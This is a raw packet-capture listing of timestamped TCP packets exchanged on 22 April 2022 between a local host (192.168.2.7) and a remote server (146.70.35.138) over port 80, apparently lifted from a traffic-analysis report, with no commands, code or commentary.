                                    Apr 22, 2022 15:27:18.223757982 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223813057 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.223964930 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223993063 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224009037 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224033117 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.224073887 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.224178076 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224201918 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224215984 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224253893 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.224280119 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.224370003 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224402905 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224419117 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.224438906 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.224466085 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.231627941 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.231911898 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264410019 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264482021 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264502048 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264524937 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264552116 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264569044 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264591932 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264600992 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264616013 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264633894 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264640093 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264659882 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264691114 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264717102 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264749050 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264791012 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264806032 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264812946 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264852047 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.264866114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.264915943 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.288505077 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.288824081 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304106951 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304168940 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304188013 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304214001 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304250002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304291010 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304305077 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304341078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304349899 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304366112 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304387093 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304406881 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304410934 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304435968 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304440975 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304451942 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304461956 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304483891 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304522991 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304558039 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304577112 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304589987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304614067 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304615021 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304640055 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304661989 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304675102 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304692984 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.312458038 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.312640905 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344346046 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344400883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344420910 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344455004 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344480038 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344496012 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344515085 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344521046 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344541073 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344547987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344564915 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344583035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344603062 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344624996 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344654083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344680071 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344697952 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344702959 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344726086 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344772100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344796896 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344813108 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344825029 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344841957 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344964027 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344990969 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345005989 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345015049 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345030069 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345031023 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345055103 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345069885 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345072031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345097065 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345097065 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345141888 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.368489027 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.368733883 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384358883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384401083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384418964 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384439945 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384465933 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384481907 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384506941 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384532928 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384546041 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384547949 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384586096 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384598017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384623051 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384639025 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384675026 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384700060 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384773016 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384798050 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384813070 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384833097 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384838104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384871960 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384875059 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384891033 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384916067 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.392765045 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.392951965 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425606012 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425728083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425769091 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425801992 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425831079 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425858021 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425875902 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425906897 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425906897 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425950050 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425966024 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426018000 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426044941 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426059008 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426069975 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426100969 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426114082 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426155090 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426155090 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426203012 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426248074 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426249981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426295042 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426337004 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426361084 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426366091 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426412106 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426420927 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426465988 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426491976 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426495075 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426537037 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.450453997 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.450664043 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464291096 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464303017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464329958 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464349031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464365959 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464379072 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464396954 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464437962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464452028 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464468002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464494944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464500904 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464515924 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464652061 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464725018 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464745045 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464802980 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464843035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464871883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464879036 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464895010 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464910984 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464946985 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464965105 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464976072 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465003967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.465040922 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465080023 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465095997 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.465106964 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465131998 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.474427938 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.474591970 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503791094 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503837109 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503859043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503886938 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503930092 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503935099 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503959894 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503966093 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503988981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504003048 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504101038 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504237890 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504303932 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504386902 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504419088 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504448891 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504457951 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504477978 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504482985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504534006 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505230904 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505280018 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505289078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505307913 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505347013 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505371094 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505390882 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505412102 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505434036 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505455017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505469084 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505546093 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505577087 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.527733088 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.527823925 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544512987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544568062 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544596910 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544639111 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544661999 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544701099 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544708967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545233011 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545286894 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545330048 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545341969 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545378923 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545546055 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545604944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545607090 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545617104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545708895 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545715094 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545759916 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545798063 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545809031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545855045 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546144962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546216011 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546246052 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546284914 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546309948 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546390057 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546443939 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546451092 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546478987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546499014 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546525002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546571016 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546603918 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546608925 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546619892 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.551635981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.551785946 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.584644079 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584686995 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584705114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584732056 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584752083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584791899 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.584825039 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585397959 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585433006 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585467100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585475922 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585484028 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585501909 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585505009 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585522890 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585545063 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585568905 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585577011 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585623980 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585632086 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585697889 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585833073 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585899115 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.629539967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.653682947 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009407043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009474039 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009495974 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009526014 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009552002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009571075 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009596109 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009603024 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009619951 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009640932 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009650946 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009659052 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009743929 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009845972 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009874105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009891987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009917974 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009924889 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009931087 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009968042 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.010001898 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050602913 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050656080 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050677061 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050703049 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050705910 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050729036 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050734043 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050746918 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050755024 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050774097 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050777912 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050798893 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050817013 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050817013 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050834894 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050852060 CEST4977580192.168.2.7146.70.35.138
